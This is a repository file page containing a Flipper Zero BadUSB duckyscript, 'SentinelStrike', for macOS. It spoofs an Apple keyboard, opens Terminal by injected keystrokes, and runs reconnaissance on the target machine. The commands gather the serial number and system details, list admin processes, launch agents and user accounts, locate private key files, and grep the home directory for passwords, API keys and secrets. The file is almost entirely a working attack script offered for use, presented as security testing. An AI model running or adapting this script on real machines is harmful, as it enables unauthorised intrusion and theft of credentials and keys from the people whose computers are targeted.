Flipper/BadUSB/MacOS-narstybits/RECON/SentinelStrike.txt

83 lines
2.2 KiB
Plaintext
Raw Normal View History

2023-08-09 04:59:16 +00:00
REM macOS Security Testing and Reconnaissance Duckyscript (Local System)
REM Unveiling the Depths of macOS Security
REM Comprehensive Testing and Advanced Reconnaissance Capabilities
REM This Script pulls just about everything you would need to know about a target MAC
REM Author: Narsty
REM Title: SentinelStrike
REM Target: MacOS
REM Version: 1.0
REM Category: RECON
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING clear
ENTER
DELAY 500
STRING echo "Starting local system security testing and reconnaissance..."
ENTER
DELAY 1000
REM Gather System Information
STRING echo "----- System Information -----"
ENTER
STRING system_profiler SPHardwareDataType SPSoftwareDataType | grep -E "Model Identifier|Processor Name|Memory|Serial Number|OS Version" | sed 's/^\s*//'
ENTER
DELAY 1000
REM Check for Suspicious Processes
STRING echo "----- Suspicious Processes -----"
ENTER
STRING ps aux | grep -E "root|admin" | grep -v grep | awk '{print $2, $11}'
ENTER
DELAY 1000
REM List Startup Items
STRING echo "----- Startup Items -----"
ENTER
STRING ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents
ENTER
DELAY 1000
REM Check User Accounts
STRING echo "----- User Accounts -----"
ENTER
STRING dscl . -list /Users | grep -v '_'
ENTER
DELAY 1000
REM Find Sensitive Files
STRING echo "----- Sensitive Files -----"
ENTER
STRING find ~ -type f \( -iname "*.key" -o -iname "*.pem" -o -iname "*.rsa" \) 2>/dev/null
ENTER
DELAY 1000
REM Search for Sensitive Information
STRING echo "----- Sensitive Information -----"
ENTER
STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' "password\|username\|apikey\|secret" ~ 2>/dev/null
ENTER
DELAY 1000
REM Check for Unsecured Files and Directories
STRING echo "----- Unsecured Files and Directories -----"
ENTER
STRING find ~ -type d \( -iname "public" -o -iname "www" \) 2>/dev/null
ENTER
DELAY 1000
REM Finished
STRING echo "----- Security testing and reconnaissance completed! -----"
ENTER